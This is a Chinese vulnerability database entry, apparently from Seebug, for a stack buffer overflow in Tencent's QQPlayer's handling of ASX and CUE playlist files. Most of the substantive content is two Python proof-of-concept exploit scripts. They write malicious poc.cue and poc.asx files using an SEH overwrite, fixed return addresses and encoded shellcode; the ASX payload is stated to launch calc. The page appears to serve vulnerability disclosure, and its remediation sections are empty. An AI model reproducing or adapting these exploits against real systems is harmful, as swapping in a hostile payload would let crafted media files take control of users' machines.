QQ影音ASX和CUE文件处理栈溢出漏洞

基本字段

漏洞编号：: SSV-19973

披露/发现时间：: 未知

提交时间：: 2010-07-23

漏洞等级：

漏洞类别：: 本地溢出

影响组件：: Tencent QQ
(2.3.969.400)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.85KB

共 3 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.45KB

#!/usr/bin/env python ################################################################# # # Title: QQPlayer cue File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400 # Vulnerable: QQPlayer<=2.3.696.400p1 # ################################################################# # Code : head = '''FILE "''' junk = "A" * 780 nseh ="\x42\x61\x21\x61" seh ="\xa9\x9e\x41\x00" adjust="\x32\x42\x61\x33\xca\x83\xc0\x10" shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o" "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41" "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK" "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01") junk_="R"*8000 foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08" payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.cue","w") fobj.write(payload) fobj.close() ========================================================= ################################################################# # # Title: QQPlayer asx File Processing Buffer Overflow Exploit # Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Test: QQPlayer 2.3.696.400 # Vulnerable: QQPlayer<=2.3.696.400p1 # Payload = calc # ################################################################# # Code : head ='''<ASX version="3.0"> <Entry> <REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_''' junk = "A" * 1975 #English XP SP3 users, try 1984 bytes instead nseh ="\x42\x61\x21\x61" seh ="\xa9\x9e\x41\x00" adjust="\x30\x83\xc0\x0c" shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV" "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL" "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9" "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW" "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R" "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA") junk_="R"*8000 foot ='''_playlis.wma"/> </Entry> </ASX>''' payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.asx","w") fobj.write(payload) fobj.close()

共 6 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

QQ影音ASX和CUE文件处理栈溢出漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

QQ影音ASX和CUE文件处理栈溢出漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定